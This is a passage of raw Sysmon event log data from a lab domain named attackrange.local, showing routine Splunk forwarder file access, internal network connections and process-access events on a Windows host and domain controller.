AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CE31E3AD68B6B8131C6B5248BF5BED6,SHA256=EE7E1776DCBA93B42FE1B431E68757A247928BE013085433B1C0F295FDA42C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:22.323{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D00E047BDCD7241373AFC4D3E95614,SHA256=960E3B582EFA0ECC3356B8E7633C234C5E96C0834964559103A0D779B4492DC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.457{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57158-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000806070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:20.378{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57157-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:23.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C96826CF9B3D76E14C5BF6DFAA9077,SHA256=89C14FC94A5A04490EFD4317F636006AE147D6BA9DB122397011294553D5CD46,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:15.709{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50912-false10.0.1.12-8000- 23542300x80000000000000001046005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:23.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54A39CD5DB7A6569916B82986C2517B9,SHA256=28FAB9D5B91688063642FBCF124839DD5ADC42029C60CDB655B669F0385F6F9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.933{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.918{0C1E0330-F2D8-60EB-3C79-00000000D001}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.792{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE9FB731A6326E3C9A49A20FF3EEE10,SHA256=E58DD7F4EF876C69F0DACFB58E4DA5C81C4FD4DB3472345FCF657AB50D502CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:24.355{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EBC09ECD6322AF706CD424D1FB004E6,SHA256=693FAFD1E9D91AF0DFB4F2C1BFA015AE2A413710D774235C20BB01D47DA4ED4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.401{0C1E0330-F2D8-60EB-3B79-00000000D001}10563920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.261{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F2D8-60EB-3B79-00000000D001}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:24.245{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows